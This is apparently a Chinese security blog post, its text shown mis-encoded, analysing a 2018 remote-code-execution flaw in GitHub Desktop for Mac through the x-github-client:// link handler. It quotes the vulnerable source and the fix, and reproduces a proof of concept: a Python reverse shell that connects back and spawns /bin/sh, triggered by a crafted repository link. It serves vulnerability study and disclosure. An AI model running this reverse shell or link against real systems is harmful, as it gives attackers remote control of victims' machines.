I"Œ<h1 id="github-desktop-for-mac--134-rce-æ¼æ´åˆ†æ">Github Desktop for Mac &lt; 1.3.4 RCE æ¼æ´åˆ†æ</h1>
<p class="date">06 Dec 2018 - Tr3jer_CongRong</p>

<p>Â Â Â Â Â Â ç™½å¤©çœ‹åˆ°è€å¤–åœ¨H1-702 2018ç©çš„é¡¹ç›®ï¼Œelectronçš„æ¡ˆä¾‹ä¸å¤šï¼Œæ„Ÿè§‰æœ‰ç‚¹æ„æ€å¤ç°ä¸‹ã€‚</p>

<blockquote>
  <p>å‡†å¤‡å·¥ä½œï¼š</p>
</blockquote>

<ul>
  <li>https://github.com/desktop/desktop/archive/release-1.3.3.zip</li>
  <li>æ¢å¤ä¸‹.git/ç›®å½•ä»¥åŠæ‰€éœ€çš„æ–‡ä»¶</li>
  <li>yarn install</li>
  <li>yarn build:prod</li>
  <li>mv dist/GitHub Desktop-darwin-x64/GitHub Desktop.app /Applications</li>
</ul>

<blockquote>
  <p>æ¼æ´æˆå› :</p>
</blockquote>

<p>é¦–å…ˆgithubçš„<code>Clone or download</code>æŒ‰é’®åŒ…å«ä¸€ä¸ª<code>Open in Desktop</code>çš„pullæ–¹å¼</p>

<p>éªŒè¯æ—¶å‘ç°ç›®å‰è¯¥æ–¹å¼çš„åè®®ä¸º<code>github-mac://</code>ä½†æ—©èµ·ç‰ˆæœ¬çš„åè®®åº”è¯¥æ˜¯<code>x-github-client://</code>ï¼Œå¹¶ä¸”åŒ…å«å‡ ä¸ªå‚æ•°:</p>

<pre><code>x-github-client://openRepo/https://github.com/user/repo?branch=master&amp;filepath=README.md
</code></pre>

<p>app/src/lib/app-shell.ts</p>

<pre><code>export const shell: IAppShell = {
	moveItemToTrash: electronShell.moveItemToTrash,
	beep: electronShell.beep,
	openExternal: path =&gt; {
		return new Promise&lt;boolean&gt;((resolve, reject) =&gt; {
			ipcRenderer.once(
				'open-external-result',
				(event: Electron.IpcMessageEvent, { result }: { result: boolean }) =&gt; {
					resolve(result)
				}
			)

			ipcRenderer.send('open-external', { path })
		})
	},
	showItemInFolder: path =&gt; {
		ipcRenderer.send('show-item-in-folder', { path })
	},
	openItem: electronShell.openItem,
}
</code></pre>

<p>ipcRendererå¯¹è±¡ä½¿ç”¨<code>show-item-in-folder</code>äº‹ä»¶å‘é€è·å–åˆ°çš„path</p>

<p>è·Ÿè¿›app/src/main-process/main.ts</p>

<pre><code>ipcMain.on(
	'show-item-in-folder',
	(event: Electron.IpcMessageEvent, { path }: { path: string }) =&gt; {
		Fs.stat(path, (err, stats) =&gt; {
			if (err) {
				log.error(`Unable to find file at '${path}'`, err)
				return
			}

			if (stats.isDirectory()) {
				openDirectorySafe(path)
			} else {
				shell.showItemInFolder(path)
			}
		})
	}
)
</code></pre>

<p>ipcMainå¯¹è±¡ç›‘å¬åˆ°è¯¥äº‹ä»¶æ¶ˆæ¯åï¼Œfsåº“åˆ¤æ–­ä¸‹æ˜¯å¦ä¸ºç›®å½•ï¼Œå¦‚æœæ˜¯åˆ™ä¼ è¿›<code>openDirectorySafe</code>ã€‚ä½†æ²¡æœ‰è€ƒè™‘åˆ°macç³»ç»Ÿä¸‹.appä¹Ÿæ˜¯ä¸ºç›®å½•çš„</p>

<pre><code>&gt; fs = require('fs')
&gt; fs.stat('/Applications/GitHub Desktop.app',(err,stats)=&gt;{console.log(stats.isDirectory())})
&gt; true
</code></pre>

<p>è·Ÿè¿›app/src/main-process/shell.ts</p>

<pre><code>export function openDirectorySafe(path: string) {
	if (__DARWIN__) {
		const directoryURL = Url.format({
			pathname: path,
			protocol: 'file:',
			slashes: true,
		})

		shell.openExternal(directoryURL)
	} else {
		shell.openItem(path)
	}
}
</code></pre>

<p>åˆ¤æ–­å¦‚æœæ˜¯macç³»ç»Ÿåˆ™ä½¿ç”¨<code>file://</code>åè®®é‡æ–°æ„é€ urlï¼Œå¹¶<code>shell.openExternal</code>è¿è¡Œã€‚</p>

<blockquote>
  <p>POC:</p>
</blockquote>

<p>ä½œè€…ç¼–å†™çš„pyç‰ˆæœ¬<a target="_blank" href="https://github.com/0xACB/github-desktop-poc">POC</a>ï¼Œå¹¶ç”¨Pyinstalleræ‰“åŒ…äº†èµ·æ¥</p>

<pre><code>import socket,subprocess,os;

os.system("open -a calculator.app")

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("localhost",1337));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
</code></pre>

<p>æœ¬åœ°ç›‘å¬ï¼Œæµè§ˆå™¨æ‰“å¼€åŒ…å«æŒ‡å®šPOC APPçš„é“¾æ¥ï¼š</p>

<pre><code>x-github-client://openRepo/https://github.com/0xACB/github-desktop-poc?branch=master&amp;filepath=osx/evil-app/rce.app
</code></pre>

<p>æµè§ˆå™¨è¯¢é—®æ˜¯å¦ä½¿ç”¨GitHub Desktop.appæ‰“å¼€ï¼Œç¡®å®šå¹¶å¼€å§‹cloneï¼Œéšååå¼¹shellã€‚</p>

<blockquote>
  <p>Fixed:</p>
</blockquote>

<p>fixæ–¹å¼å¾ˆç®€å•ï¼Œåˆ¤æ–­ä¸æ˜¯macç³»ç»Ÿæœ€ç»ˆæ‰å¯ä»¥æ‰“å¼€</p>

<pre><code>-        if (stats.isDirectory()) {
+        if (!__DARWIN__ &amp;&amp; stats.isDirectory()) {
</code></pre>
:ET